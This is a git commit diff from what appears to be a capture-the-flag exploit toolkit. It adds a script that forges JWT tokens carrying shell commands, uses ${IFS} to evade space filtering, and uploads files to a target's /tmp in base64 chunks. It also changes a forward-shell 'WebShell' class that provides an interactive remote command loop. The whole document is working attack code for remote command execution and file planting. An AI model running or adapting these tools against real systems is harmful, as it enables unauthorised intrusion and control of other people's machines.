Fixed issue with uploading file

2022-03-04 23:24:31 -05:00
parent a19314573d
commit ed9d0082a8
2 changed files with 46 additions and 7 deletions
--- a/file_upload.py
+++ b/file_upload.py
@ -0,0 +1,36 @@
+import base64
+import os
+import jwt
+import requests
+
+
+def send_cmd(cmd):
+    payload = {'cmd': cmd.replace(' ', '${IFS}')}
+    token = jwt.encode(payload, 'hope you enjoy this challenge -ippsec', algorithm='HS256')
+    headers = {'Authorization': 'Bearer {}'.format(token.decode())}
+    output = requests.get('http://172.16.1.22:3000', headers=headers)
+    return output.content
+
+
+def send_file():
+    """
+
+    :return:
+    """
+    file = input("Please enter path to file: ")
+    file_name = os.path.basename(file)
+
+    print(f'Uploading File {file_name}')
+    with open(file, 'rb') as f:
+        send_cmd(f'cd /tmp && rm -f {file_name}')  # clear the file if it exists
+        while True:
+            chunk = f.read(1024)
+            if not chunk:
+                break
+            send_cmd(f'cd /tmp && echo {base64.b64encode(chunk)} | base64 -d >> {file_name}')
+
+    print('Done Sending File')
+
+
+if __name__ == '__main__':
+    send_file()
--- a/forward_shell.py
+++ b/forward_shell.py
@ -47,7 +47,6 @@ class WebShell(object):
        :return:
        """
        get_output = f"/bin/cat {self.stdout}"
-        get_output = get_output.replace(' ', '${IFS}')
        while True:
            result = self.run_raw_command(get_output)
            if result:
@ -103,14 +102,16 @@ class WebShell(object):
        file = input("Please enter path to file: ")
        file_name = os.path.basename(file)

-        print(f'Uploading File {file_name}')
+        print(f'[*] Uploading File {file_name}')
+        self.write_command(f'rm -f /tmp/{file_name}')  # clear the file if it exists
        with open(file, 'rb') as f:
-            chunk = f.read(1024)
-            self.write_command(f'cd /tmp && echo {base64.b64encode(chunk)} | base64 -d > {file_name}')
-            while chunk:
-                self.write_command(f'cd /tmp && echo {base64.b64encode(chunk)} | base64 -d >> {file_name}')
+            b64 = base64.b64encode(f.read()).decode()
+            x = 8192
+            for i in range(0, len(b64), x):
+                chunk = b64[i:i+x]
+                self.write_command(f'echo {chunk} | base64 -d >> /tmp/{file_name}')

-        print('Done Sending File')
+        print(f'[*] Done Sending File to /tmp/{file_name}')


 prompt = "Please Subscribe> "
@ -122,5 +123,7 @@ while True:
        s.upgrade_shell()
    elif cmd == "upload":
        s.send_file()
+    elif cmd in ["quit", "exit"]:
+        break
    else:
        s.write_command(cmd)